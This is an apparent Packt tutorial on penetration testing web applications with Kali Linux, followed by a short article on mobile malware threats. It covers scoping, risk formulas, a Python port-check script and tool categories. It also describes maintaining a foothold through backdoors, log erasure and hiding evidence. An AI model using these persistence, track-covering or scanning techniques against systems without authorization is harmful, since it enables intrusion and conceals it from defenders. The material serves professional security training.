vulnerabilities and exploiting web applications. This article will cover researching targets, identifying and exploiting vulnerabilities in web applications as well as clients using web application services, defending web applications against common attacks, and building Penetration Testing deliverables for professional services practice. We believe this article is great for anyone who is interested in learning how to become a Penetration Tester, users who are new to Kali Linux and want to learn the features and differences in Kali versus BackTrack, and seasoned Penetration Testers who may need a refresher or reference on new tools and techniques. This article will break down the fundamental concepts behind various security services as well as guidelines for building a professional Penetration Testing practice. Concepts include differentiating a Penetration Test from other services, methodology overview, and targeting web applications. This article also provides a brief overview of setting up a Kali Linux testing or real environment. Web application Penetration Testing concepts A web application is any application that uses a web browser as a client. This can be a simple message board or a very complex spreadsheet. 
Web applications are popular based on ease of access to services and centralized management of a system used by multiple parties. Requirements for accessing a web application can follow industry web browser client standards simplifying expectations from both the service providers as well as the hosts accessing the application. Web applications are the most widely used type of applications within any organization. They are the standard for most Internet-based applications. If you look at smartphones and tablets, you will find that most applications on these devices are also web applications. This has created a new and large target-rich surface for security professionals as well as attackers exploiting those systems. Penetration Testing web applications can vary in scope since there is a vast number of system types and business use cases for web application services. The core web application tiers which are hosting servers, accessing devices, and data depository should be tested along with communication between the tiers during a web application Penetration Testing exercise. An example for developing a scope for a web application Penetration Test is testing a Linux server hosting applications for mobile devices. The scope of work at a minimum should include evaluating the Linux server (operating system, network configuration, and so on), applications hosted from the server, how systems and users authenticate, client devices accessing the server and communication between all three tiers. Additional areas of evaluation that could be included in the scope of work are how devices are obtained by employees, how devices are used outside of accessing the application, the surrounding network(s), maintenance of the systems, and the users of the systems. Some examples of why these other areas of scope matter are having the Linux server compromised by permitting connection from a mobile device infected by other means or obtaining an authorized mobile device through social media to capture confidential information. Some deliverable examples in this article offer checkbox surveys that can assist with walking a customer through possible targets for a web application Penetration Testing scope of work. Every scope of work should be customized around your customer's business objectives, expected timeframe of performance, allocated funds, and desired outcome. As stated before, templates serve as tools to enhance a design session for developing a scope of work. Penetration Testing methodology There are logical steps recommended for performing a Penetration Test. The first step is identifying the project's starting status. The most common terminology defining the starting state is Black box testing, White box testing, or a blend between White and Black box testing known as Gray box testing. Black box assumes the Penetration Tester has no prior knowledge of the target network, company processes, or services it provides. Starting a Black box project requires a lot of reconnaissance and, typically, is a longer engagement based on the concept that real-world attackers can spend long durations of time studying targets before launching attacks. As a security professional, we find Black box testing presents some problems when scoping a Penetration Test. Depending on the system and your familiarity with the environment, it can be difficult to estimate how long the reconnaissance phase will last. This usually presents a billing problem. 
Customers, in most cases, are not willing to write a blank cheque for you to spend unlimited time and resources on the reconnaissance phase; however, if you do not spend the time needed then your Penetration Test is over before it began. It is also unrealistic because a motivated attacker will not necessarily have the same scoping and billing restrictions as a professional Penetration Tester. That is why we recommend Gray box over Black box testing. White box is when a Penetration Tester has intimate knowledge about the system. The goals of the Penetration Test are clearly defined and the outcome of the report from the test is usually expected. The tester has been provided with details on the target such as network information, type of systems, company processes, and services. White box testing typically is focused on a particular business objective such as meeting a compliance need, rather than generic assessment, and could be a shorter engagement depending on how the target space is limited. White box assignments could reduce information gathering efforts, such as reconnaissance services, equaling less cost for Penetration Testing services. Gray box testing falls in between Black and White box testing. It is when the client or system owner agrees that some unknown information will eventually be discovered during a Reconnaissance phase, but allows the Penetration Tester to skip this part. The Penetration Tester is provided some basic details of the target; however, internal workings and some other privileged information is still kept from the Penetration Tester. Real attackers tend to have some information about a target prior to engaging the target. Most attackers (with the exception of script kiddies or individuals downloading tools and running them) do not choose random targets. They are motivated and have usually interacted in some way with their target before attempting an attack. Gray box is an attractive choice approach for many security professionals conducting Penetration Tests because it mimics real-world approaches used by attackers and focuses on vulnerabilities rather than reconnaissance. The scope of work defines how penetration services will be started and executed. Kicking off a Penetration Testing service engagement should include an information gathering session used to document the target environment and define the boundaries of the assignment to avoid unnecessary reconnaissance services or attacking systems that are out of scope. A well-defined scope of work will save a service provider from scope creep (defined as uncontrolled changes or continuous growth in a project's scope), operate within the expected timeframe and help provide more accurate deliverable upon concluding services. Real attackers do not have boundaries such as time, funding, ethics, or tools meaning that limiting a Penetration Testing scope may not represent a real-world scenario. In contrast to a limited scope, having an unlimited scope may never evaluate critical vulnerabilities if a Penetration Test is concluded prior to attacking desired systems. For example, a Penetration Tester may capture user credentials to critical systems and conclude with accessing those systems without testing how vulnerable those systems are to network-based attacks. It's also important to include who is aware of the Penetration Test as a part of the scope. Real attackers may strike at anytime and probably when people are least expecting it. 
Some fundamentals for developing a scope of work for a Penetration Test are as follows: Definition of Target System(s): This specifies what systems should be tested. This includes the location on the network, types of systems, and business use of those systems. Timeframe of Work Performed: When the testing should start and what is the timeframe provided to meet specified goals. Best practice is NOT to limit the time scope to business hours. How Targets Are Evaluated: What types of testing methods such as scanning or exploitation are and not permitted? What is the risk associated with permitted specific testing methods? What is the impact of targets that become inoperable due to penetration attempts? Examples are; using social networking by pretending to be an employee, denial of service attack on key systems, or executing scripts on vulnerable servers. Some attack methods may pose a higher risk of damaging systems than others. Tools and software: What tools and software are used during the Penetration Test? This is important and a little controversial. Many security professionals believe if they disclose their tools they will be giving away their secret sauce. We believe this is only the case when security professionals used widely available commercial products and are simply rebranding canned reports from these products. Seasoned security professionals will disclose the tools being used, and in some cases when vulnerabilities are exploited, documentation on the commands used within the tools to exploit a vulnerability. This makes the exploit re-creatable, and allows the client to truly understand how the system was compromised and the difficulty associated with the exploit. Notified Parties: Who is aware of the Penetration Test? Are they briefed beforehand and able to prepare? Is reaction to penetration efforts part of the scope being tested? If so, it may make sense not to inform the security operations team prior to the Penetration Test. This is very important when looking at web applications that may be hosted by another party such as a cloud service provider that could be impacted from your services. Initial Access Level: What type of information and access is provided prior to kicking off the Penetration Test? Does the Penetration Tester have access to the server via Internet and/or Intranet? What type of initial account level access is granted? Is this a Black, White, or Gray box assignment for each target? Definition of Target Space: This defines the specific business functions included in the Penetration Test. For example, conducting a Penetration Test on a specific web application used by sales while not touching a different application hosted from the same server. Identification of Critical Operation Areas: Define systems that should not be touched to avoid a negative impact from the Penetration Testing services. Is the active authentication server off limits? It's important to make critical assets clear prior to engaging a target. Definition of the Flag: It is important to define how far a Penetration Test should compromise a system or a process. Should data be removed from the network or should the attacker just obtain a specific level of unauthorized access? Deliverable: What type of final report is expected? What goals does the client specify to be accomplished upon closing a Penetration Testing service agreement? Make sure the goals are not open-ended to avoid scope creep of expected service. Is any of the data classified or designated for a specific group of people? 
How should the final report be delivered? It is important to deliver a sample report or periodic updates so that there are no surprises in the final report. Remediation expectations: Are vulnerabilities expected to be documented with possible remediation action items? Who should be notified if a system is rendered unusable during a Penetration Testing exercise? What happens if sensitive data is discovered? Most Penetration Testing services do NOT include remediation of problems found. Some service definitions that should be used to define the scope of services are: Security Audit: Evaluating a system or an application's risk level against a set of standards or baselines. Standards are mandatory rules while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies, and processes. Most requests for security serves for audits are focused on passing an official audit (for example preparing for a corporate or a government audit) or proving the baseline requirements are met for a mandatory set of regulations (for example following the HIPAA and HITECH mandates for protecting healthcare records). It is important to inform potential customers if your audit services include any level of insurance or protection if an audit isn't successful after your services. It's also critical to document the type of remediation included with audit services (that is, whether you would identify a problem, offer a remediation action plan or fix the problem). Auditing for compliance is much more than running a security tool. It relies heavily on the standard types of reporting and following a methodology that is an accepted standard for the audit. In many cases, security audits give customers a false sense of security depending on what standards or baselines are being audited. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today's cyber world. It is HIGHLY recommended to offer security services beyond standards and baselines to raise the level of security to an acceptable level of protection for real-world threats. Services should include following up with customers to assist with remediation along with raising the bar for security beyond any industry standards and baselines. Vulnerability Assessment: This is the process in which network devices, operating systems and application software are scanned in order to identify the presence of known and unknown vulnerabilities. Vulnerability is a gap, error, or weakness in how a system is designed, used, and protected. When a vulnerability is exploited, it can result in giving unauthorized access, escalation of privileges, denial-of-service to the asset, or other outcomes. Vulnerability Assessments typically stop once a vulnerability is found, meaning that the Penetration Tester doesn't execute an attack against the vulnerability to verify if it's genuine. A Vulnerability Assessment deliverable provides potential risk associated with all the vulnerabilities found with possible remediation steps. There are many solutions such as Kali Linux that can be used to scan for vulnerabilities based on system/server type, operating system, ports open for communication and other means. Vulnerability Assessments can be White, Gray, or Black box depending on the nature of the assignment. Vulnerability scans are only useful if they calculate risk. 
The downside of many security audits is vulnerability scan results that make security audits thicker without providing any real value. Many vulnerability scanners have false positives or identify vulnerabilities that are not really there. They do this because they incorrectly identify the OS or are looking for specific patches to fix vulnerabilities but not looking at rollup patches (patches that contain multiple smaller patches) or software revisions. Assigning risk to vulnerabilities gives a true definition and sense of how vulnerable a system is. In many cases, this means that vulnerability reports by automated tools will need to be checked. Customers will want to know the risk associated with vulnerability and expected cost to reduce any risk found. To provide the value of cost, it's important to understand how to calculate risk. Calculating risk It is important to understand how to calculate risk associated with vulnerabilities found, so that a decision can be made on how to react. Most customers look to the CISSP triangle of CIA when determining the impact of risk. CIA is the confidentiality, integrity, and availability of a particular system or application. When determining the impact of risk, customers must look at each component individually as well as the vulnerability in its entirety to gain a true perspective of the risk and determine the likelihood of impact. It is up to the customer to decide if the risk associated to vulnerability found justifies or outweighs the cost of controls required to reduce the risk to an acceptable level. A customer may not be able to spend a million dollars on remediating a threat that compromises guest printers; however, they will be very willing to spend twice as much on protecting systems with the company's confidential data. The Certified Information Systems Security Professional (CISSP) curriculum lists formulas for calculating risk as follow. A Single Loss Expectancy (SLE) is the cost of a single loss to an Asset Value (AV). Exposure Factor (EF) is the impact the loss of the asset will have to an organization such as loss of revenue due to an Internet-facing server shutting down. Customers should calculate the SLE of an asset when evaluating security investments to help identify the level of funding that should be assigned for controls. If a SLE would cause a million dollars of damage to the company, it would make sense to consider that in the budget. The Single Loss Expectancy formula: SLE = AV * EF The next important formula is identifying how often the SLE could occur. If an SLE worth a million dollars could happen once in a million years, such as a meteor falling out of the sky, it may not be worth investing millions in a protection dome around your headquarters. In contrast, if a fire could cause a million dollars worth of damage and is expected every couple of years, it would be wise to invest in a fire prevention system. The number of times an asset is lost is called the Annual Rate of Occurrence (ARO). The Annualized Loss Expectancy (ALE) is an expression of annual anticipated loss due to risk. For example, a meteor falling has a very low annualized expectancy (once in a million years), while a fire is a lot more likely and should be calculated in future investments for protecting a building. Annualized Loss Expectancy formula: ALE = SLE * ARO The final and important question to answer is the risk associated with an asset used to figure out the investment for controls. 
This can determine if and how much the customer should invest into remediating a vulnerability found in an asset. Risk formula: Risk = Asset Value * Threat * Vulnerability * Impact It is common for customers not to have values for variables in Risk Management formulas. These formulas serve as guidance systems to help the customer better understand how they should invest in security. In the previous examples, using the formulas with estimated values for a meteor shower and a fire in a building should help explain, in estimated dollar values, why a fire prevention system is a better investment than a metal dome protecting against falling objects. Penetration Testing is the method of attacking system vulnerabilities in a similar way to real malicious attackers. Typically, Penetration Testing services are requested when a system or network has exhausted investments in security and clients are seeking to verify if all avenues of security have been covered. Penetration Testing can be Black, White, or Gray box depending on the scope of work agreed upon. The key difference between a Penetration Test and a Vulnerability Assessment is that a Penetration Test will act upon vulnerabilities found and verify if they are real, reducing the list to the confirmed risks associated with a target. A Vulnerability Assessment of a target could change to a Penetration Test once the asset owner has authorized the service provider to execute attacks against the vulnerabilities identified in a target. Typically, Penetration Testing services have a higher cost associated with them, since the services require more expensive resources, tools, and time to successfully complete assignments. One popular misconception is that a Penetration Testing service enhances IT security since its services have a higher cost associated than other security services: Penetration Testing does not make IT networks more secure, since services evaluate existing security! A customer should not consider a Penetration Test if there is a belief that the target is not completely secure. Penetration Testing can cause a negative impact to systems: It's critical to have authorization in writing from the proper authorities before starting a Penetration Test of an asset owned by another party. Not having proper authorization could be seen as illegal hacking by authorities. Authorization should include who is liable for any damages caused during a penetration exercise as well as who should be contacted to avoid future negative impacts once a system is damaged. Best practice is alerting the customers of all the potential risks associated with each method used to compromise a target prior to executing the attack, to level-set expectations. This is also one of the reasons we recommend targeted Penetration Testing with a small scope. It is easier to be much more methodical in your approach. As a common best practice, we obtain confirmation that, in a worst-case scenario, a system can be restored by the customer using backups or some other disaster recovery method. Penetration Testing deliverable expectations should be well defined while agreeing on a scope of work. The most common method by which hackers obtain information about targets is social engineering, that is, attacking people rather than systems. An example is interviewing for a position within the organization and walking out a week later with sensitive data that was offered without resistance.
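To tie the SLE, ALE, and risk formulas above together, the following short Python sketch runs the fire-versus-meteor comparison. The asset value, exposure factors, and occurrence rates are illustrative assumptions chosen for the example, not figures from any real assessment.

def single_loss_expectancy(asset_value, exposure_factor):
    # SLE = AV * EF: the cost of a single loss to the asset
    return asset_value * exposure_factor

def annualized_loss_expectancy(sle, annual_rate_of_occurrence):
    # ALE = SLE * ARO: the anticipated loss per year
    return sle * annual_rate_of_occurrence

# A $2,000,000 building (illustrative value)
fire_sle = single_loss_expectancy(2_000_000, 0.5)                    # a fire destroys half the asset
fire_ale = annualized_loss_expectancy(fire_sle, 1 / 2)               # expected once every two years

meteor_sle = single_loss_expectancy(2_000_000, 1.0)                  # a meteor strike is a total loss
meteor_ale = annualized_loss_expectancy(meteor_sle, 1 / 1_000_000)   # expected once in a million years

print(f"Fire   - SLE: ${fire_sle:,.0f}  ALE: ${fire_ale:,.0f} per year")
print(f"Meteor - SLE: ${meteor_sle:,.0f}  ALE: ${meteor_ale:,.0f} per year")

With the fire ALE coming out at roughly $500,000 a year and the meteor ALE at around two dollars a year, the numbers tell the same story as the text: a fire prevention system is worth budgeting for, while a protective dome is not. With the numbers out of the way, we can return to the question of deliverables raised by the social engineering example above.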
This type of deliverable may not be acceptable if a customer is interested in knowing how vulnerable their web applications are to remote attack. It is also important to have a defined end-goal so that all parties understand when the penetration services are considered concluded. Usually, an agreed-upon deliverable serves this purpose. A Penetration Testing engagement's success for a service provider is based on profitability of time and services used to deliver the Penetration Testing engagement. A more efficient and accurate process means better results for less services used. The higher the quality of the deliverables, the closer the service can meet customer expectation, resulting in a better reputation and more future business. For these reasons, it's important to develop a methodology for executing Penetration Testing services as well as for how to report what is found. Kali Penetration Testing concepts Kali Linux is designed to follow the flow of a Penetration Testing service engagement. Regardless if the starting point is White, Black, or Gray box testing, there is a set of steps that should be followed when Penetration Testing a target with Kali or other tools. Step 1 – Reconnaissance You should learn as much as possible about a target's environment and system traits prior to launching an attack. The more information you can identify about a target, the better chance you have to identify the easiest and fastest path to success. Black box testing requires more reconnaissance than White box testing since data is not provided about the target(s). Reconnaissance services can include researching a target's Internet footprint, monitoring resources, people, and processes, scanning for network information such as IP addresses and systems types, social engineering public services such as help desk and other means. Reconnaissance is the first step of a Penetration Testing service engagement regardless if you are verifying known information or seeking new intelligence on a target. Reconnaissance begins by defining the target environment based on the scope of work. Once the target is identified, research is performed to gather intelligence on the target such as what ports are used for communication, where it is hosted, the type of services being offered to clients, and so on. This data will develop a plan of action regarding the easiest methods to obtain desired results. The deliverable of a reconnaissance assignment should include a list of all the assets being targeted, what applications are associated with the assets, services used, and possible asset owners. Kali Linux offers a category labeled Information Gathering that serves as a Reconnaissance resource. Tools include methods to research network, data center, wireless, and host systems. The following is the list of Reconnaissance goals: Identify target(s) Define applications and business use Identify system types Identify available ports Identify running services Passively social engineer information Document findings Step 2 – Target evaluation Once a target is identified and researched from Reconnaissance efforts, the next step is evaluating the target for vulnerabilities. At this point, the Penetration Tester should know enough about a target to select how to analyze for possible vulnerabilities or weakness. Examples for testing for weakness in how the web application operates, identified services, communication ports, or other means. 
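As a small illustration of the 'identify available ports' and 'identify running services' goals listed above, the following Python sketch performs a quick TCP connect check against a handful of common service ports. The 192.168.1.10 address is a placeholder for a lab system you are authorized to test; in a real engagement you would normally reach for purpose-built tools such as Nmap from the Information Gathering category rather than a hand-rolled script.

import socket

TARGET = "192.168.1.10"   # placeholder for a lab host you are authorized to test
COMMON_PORTS = {
    21: "ftp",
    22: "ssh",
    25: "smtp",
    80: "http",
    443: "https",
    3306: "mysql",
    8080: "http-alt",
}

def check_port(host, port, timeout=1.0):
    # A successful TCP connection suggests a listening service on that port
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0

for port, service in sorted(COMMON_PORTS.items()):
    state = "open" if check_port(TARGET, port) else "closed/filtered"
    print(f"{TARGET}:{port:<5} ({service}) {state}")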
Vulnerability Assessments and Security Audits typically conclude after this phase of the target evaluation process. Capturing detailed information through Reconnaissance improves accuracy of targeting possible vulnerabilities, shortens execution time to perform target evaluation services, and helps to avoid existing security. For example, running a generic vulnerability scanner against a web application server would probably alert the asset owner, take a while to execute and only generate generic details about the system and applications. Scanning a server for a specific vulnerability based on data obtained from Reconnaissance would be harder for the asset owner to detect, provide a good possible vulnerability to exploit, and take seconds to execute. Evaluating targets for vulnerabilities could be manual or automated through tools. There is a range of tools offered in Kali Linux grouped as a category labeled Vulnerability Analysis. Tools range from assessing network devices to databases. The following is the list of Target Evaluation goals: Evaluation targets for weakness Identify and prioritize vulnerable systems Map vulnerable systems to asset owners Document findings Step 3 – Exploitation This step exploits vulnerabilities found to verify if the vulnerabilities are real and what possible information or access can be obtained. Exploitation separates Penetration Testing services from passive services such as Vulnerability Assessments and Audits. Exploitation and all the following steps have legal ramifications without authorization from the asset owners of the target. The success of this step is heavily dependent on previous efforts. Most exploits are developed for specific vulnerabilities and can cause undesired consequences if executed incorrectly. Best practice is identifying a handful of vulnerabilities and developing an attack strategy based on leading with the most vulnerable first. Exploiting targets can be manual or automated depending on the end objective. Some examples are running SQL Injections to gain admin access to a web application or social engineering a Helpdesk person into providing admin login credentials. Kali Linux offers a dedicated catalog of tools titled Exploitation Tools for exploiting targets that range from exploiting specific services to social engineering packages. The following is the list of Exploitation goals: Exploit vulnerabilities Obtain foothold Capture unauthorized data Aggressively social engineer Attack other systems or applications Document findings Step 4 – Privilege Escalation Having access to a target does not guarantee accomplishing the goal of a penetration assignment. In many cases, exploiting a vulnerable system may only give limited access to a target's data and resources. The attacker must escalate privileges granted to gain the access required to capture the flag, which could be sensitive data, critical infrastructure, and so on. Privilege Escalation can include identifying and cracking passwords, user accounts, and unauthorized IT space. An example is achieving limited user access, identifying a shadow file containing administration login credentials, obtaining an administrator password through password cracking, and accessing internal application systems with administrator access rights. Kali Linux includes a number of tools that can help gain Privilege Escalation through the Password Attacks and Exploitation Tools catalog. 
Since most of these tools include methods to obtain initial access and Privilege Escalation, they are gathered and grouped according to their toolsets. The following is a list of Privilege Escalation goals: Obtain escalated level access to system(s) and network(s) Uncover other user account information Access other systems with escalated privileges Document findings Step 5 – Maintaining a foothold The final step is maintaining access by establishing other entry points into the target and, if possible, covering evidence of the penetration. It is possible that penetration efforts will trigger defenses that will eventually secure how the Penetration Tester obtained access to the network. Best practice is establishing other means to access the target as insurance against the primary path being closed. Alternative access methods could be backdoors, new administration accounts, encrypted tunnels, and new network access channels. The other important aspect of maintaining a foothold in a target is removing evidence of the penetration. This will make it harder to detect the attack, thus reducing the reaction by security defenses. Removing evidence includes erasing user logs, masking existing access channels, and removing the traces of tampering, such as error messages caused by penetration efforts. Kali Linux includes a catalog titled Maintaining Access focused on keeping a foothold within a target. Tools are used for establishing various forms of backdoors into a target. The following is a list of goals for maintaining a foothold: Establish multiple access methods to the target network Remove evidence of unauthorized access Repair systems impacted by exploitation Inject false data if needed Hide communication methods through encryption and other means Document findings Introducing Kali Linux The creators of BackTrack have released a new, advanced Penetration Testing Linux distribution named Kali Linux. BackTrack 5 was the last major version of the BackTrack distribution. The creators of BackTrack decided that, to move forward with the challenges of cyber security and modern testing, a new foundation was needed. Kali Linux was born and released on March 13th, 2013. Kali Linux is based on Debian and an FHS-compliant filesystem. Kali has many advantages over BackTrack. It comes with many more updated tools. The tools are streamlined with the Debian repositories and synchronized four times a day. That means users have the latest package updates and security fixes. The new FHS-compliant filesystem translates into being able to run most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments strong features in Kali Linux. Kali Linux is available for download at http://www.kali.org/. Kali system setup Kali Linux can be downloaded in a few different ways. One of the most popular ways to get Kali Linux is to download the ISO image. The ISO image is available in 32-bit and 64-bit images. If you plan on using Kali Linux on a virtual machine such as VMware, there is a prebuilt VM image. The advantage of downloading the VM image is that it comes preloaded with VMware tools. The VM image is a 32-bit image with Physical Address Extension support, better known as PAE. In theory, a PAE kernel allows the system to access more system memory than a traditional 32-bit operating system. There have been some well-known personalities in the world of operating systems that have argued for and against the usefulness of a PAE kernel.
However, the authors of this article suggest using the VM image of Kali Linux if you plan on using it in a virtual environment. Running Kali Linux from external media Kali Linux can be run without installing software on a host hard drive by accessing it from an external media source such as a USB drive or DVD. This method is simple to enable; however, it has performance and operational implications. Because Kali Linux has to load programs from a slower external source, performance is impacted and some applications or hardware settings may not operate properly. Using read-only storage media does not permit saving custom settings that may be required to make Kali Linux operate correctly. It's highly recommended to install Kali Linux on a host hard drive. Installing Kali Linux Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you'll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are shown in the following list, although we suggest exceeding the minimum amount by at least three times. Kali Linux, in general, will perform better if it has access to more RAM and is installed on newer machines. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or a USB port on your computer, check out the Kali Linux Network Install. The following is a list of minimum installation requirements: A minimum of 8 GB disk space for installing Kali Linux. For i386 and amd64 architectures, a minimum of 512MB RAM. CD-DVD Drive / USB boot support. You will also need an active Internet connection before installation. This is very important, or you will not be able to configure and access repositories during installation. When you start Kali, you will be presented with a Boot Install screen. You may choose what type of installation (GUI-based or text-based) you would like to perform. Select the local language preference, country, and keyboard preferences. Select a hostname for the Kali Linux host. The default hostname is Kali. Select a password. Simple passwords may not work, so choose something that has some degree of complexity. The next prompt asks for your timezone. Modify accordingly and select Continue. The next screenshot shows selecting Eastern standard time. The installer will ask to set up your partitions. If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind that on a virtual machine, only the virtual disk is getting destroyed. Advanced users can select manual configurations to customize partitions. Kali also offers the option of using LVM, the logical volume manager. LVM allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change after the initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need to use it. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process as shown in the following screenshot: Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via the HTTP protocol.
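Because the tools are synchronized with the repositories several times a day, keeping an installed system current is a routine task that can be scripted. The following is a minimal Python sketch that refreshes the package lists and applies pending updates; it assumes a standard Kali install with working network access and root privileges.

import os
import subprocess

def run(cmd):
    # Show each command before executing it; stop if anything fails
    print("[*] " + " ".join(cmd))
    subprocess.check_call(cmd)

if os.geteuid() != 0:
    raise SystemExit("Run this as root so apt-get can modify the system.")

# Refresh the package lists from the Kali repositories, then apply any
# pending tool and security updates in one pass
run(["apt-get", "update"])
run(["apt-get", "-y", "dist-upgrade"])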
If your network uses a proxy server, you will also need to configure the proxy settings for your network. Kali will prompt you to install GRUB. GRUB is a multi-boot loader that gives the user the ability to pick and boot into multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the option to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux. Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue to reboot your system. Kali Linux and VM image first run On some Kali installation methods, you will be asked to set the root password. When Kali Linux boots up, enter the root username and the password you selected. If you downloaded a VM image of Kali, you will need the root password. The default username is root and the password is toor. Kali toolset overview Kali Linux offers a number of customized tools designed for Penetration Testing. Tools are categorized in the following groups as seen in the drop-down menu shown in the following screenshot: Information Gathering: These are Reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to the protocols used. Vulnerability Analysis: Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering Reconnaissance tools. Web Applications: These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this article come directly from this category. However, web applications do not always refer to attacks against web servers; they can simply be web-based tools for networking services. For example, web proxies will be found under this section. Password Attacks: This section of tools primarily deals with brute force or the offline computation of passwords or shared keys used for authentication. Wireless Attacks: These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools will be found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section will need to be used with a wireless adapter that can be configured by Kali to be put in promiscuous mode. Exploitation Tools: These are tools used to exploit vulnerabilities found in systems. Usually, a vulnerability is identified during a Vulnerability Assessment of a target. Sniffing and Spoofing: These are tools used for network packet captures, network packet manipulators, packet crafting applications, and web spoofing. There are also a few VoIP reconstruction applications. Maintaining Access: Maintaining Access tools are used once a foothold is established into a target system or network. It is common to find compromised systems having multiple hooks back to the attacker to provide alternative routes in the event a vulnerability that is used by the attacker is found and remediated. Reverse Engineering: These tools are used to disassemble an executable and debug programs.
The purpose of reverse engineering is analyzing how a program was developed so that it can be copied, modified, or used as the basis for developing other programs. Reverse Engineering is also used for malware analysis to determine what an executable does, or by researchers to attempt to find vulnerabilities in software applications. Stress Testing: Stress Testing tools are used to evaluate how much data a system can handle. Undesired outcomes could be obtained from overloading systems, such as causing a device controlling network communication to open all communication channels or a system shutting down (also known as a denial of service attack). Hardware Hacking: This section contains Android tools, which could be classified as mobile, and Arduino tools that are used for programming and controlling other small electronic devices. Forensics: Forensics tools are used to monitor and analyze computer network traffic and applications. Reporting Tools: Reporting tools are methods to deliver information found during a penetration exercise. System Services: This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH. Summary This article served as an introduction to Penetration Testing Web Applications and an overview of setting up Kali Linux. We started off defining best practices for performing Penetration Testing services, including defining risk and the differences between various services. The key takeaway is to understand what makes a Penetration Test different from other security services, how to properly scope a level of service, and the best method to perform services. Positioning the right expectations upfront with a potential client will better qualify the opportunity and simplify developing an acceptable scope of work. This article continued by providing an overview of Kali Linux. Topics included how to download your desired version of Kali Linux, ways to perform the installation, and a brief overview of the toolsets available. The next article will cover how to perform Reconnaissance on a target. This is the first and most critical step in delivering Penetration Testing services. Resources for Article: Further resources on this subject: BackTrack 4: Security with Penetration Testing Methodology [Article] CISSP: Vulnerability and Penetration Testing for Access Control [Article] Making a Complete yet Small Linux Distribution [Article]


Mobile and Social - the Threats You Should Know About

Packt
17 Sep 2013
8 min read
(For more resources related to this topic, see here.) A prediction of the future (and the lottery numbers for next week) scams Security threats, such as malware, are starting to be manifested on mobile devices, as we are learning that mobile devices are not immune to virus, malware, and other attacks. As PCs are increasingly being replaced by the use of mobile devices, the incidence of new attacks against mobile devices is growing. The user has to take precautions to protect their mobile devices just as they would protect their PC. One major type of mobile cybercrime is the unsolicited text message that captures personal details. Another type of cybercrime involves an infected phone that sends out an SMS message that results in excess connectivity charges. Mobile threats are on the rise according to the Symantec Report of 2012; 31 percent of all mobile users have received an SMS from someone that they didn't know. An example is where the user receives an SMS message that includes a link or phone number. This technique is used to install malware onto your mobile device. Also, these techniques are an attempt to hoax you into disclosing personal or private data. In 2012, Symantec released a new cybercrime report. They concluded that countries like Russia, China, and South Africa have the highest cybercrime incidents. Their rate of exploitation ranges from 80 to 92 percent. You can find this report at http://now-static.norton.com/now/en/pu/images/Promotions/2012/cybercrimeReport/2012_Norton_Cybercrime_Report_Master_FINAL_050912.pdf. Malware The most common type of threat is known as malware . It is short for malicious software. Malware is used or created by attackers to disrupt many types of computer operations, collect sensitive information, or gain access to a private mobile device/computer. It includes worms, Trojan horses, computer viruses, spyware, keyloggers and root kits, and other malicious programs. As mobile malware is increasing at a rapid speed, the U.S. government wants users to be aware of all the dangers. So in October 2012, the FBI issued a warning about mobile malware (http://www.fbi.gov/sandiego/press-releases/2012/smartphone-users-should-be-aware-of-malware-targeting-mobile-devices-and-the-safety-measures-to-help-avoid-compromise). The IC3 has been made aware of various malware attacking Android operating systems for mobile devices. Some of the latest known versions of this type of malware are Loozfon and FinFisher. Loozfon hooks its victims by emailing the user with promising links such as: a profitable payday just for sending out email. It then plants itself onto the phone when the user clicks on this link. This specific malware will attach itself to the device and start to collect information from your device, including: Contact information E-mail address Phone numbers Phone number of the compromised device On the other hand, a spyware called FinFisher can take over various components of a smartphone. According to IC3, this malware infects the device through a text message and via a phony e-mail link. FinFisher attacks not only Android devices, but also devices running Blackberry, iOS, and Windows. Various security reports have shown that mobile malware is on the rise. Cyber criminals tend to target Android mobile devices. As a result, Android users are getting an increasing amount of destructive Trojans, mobile botnets, and SMS-sending malware and spyware. 
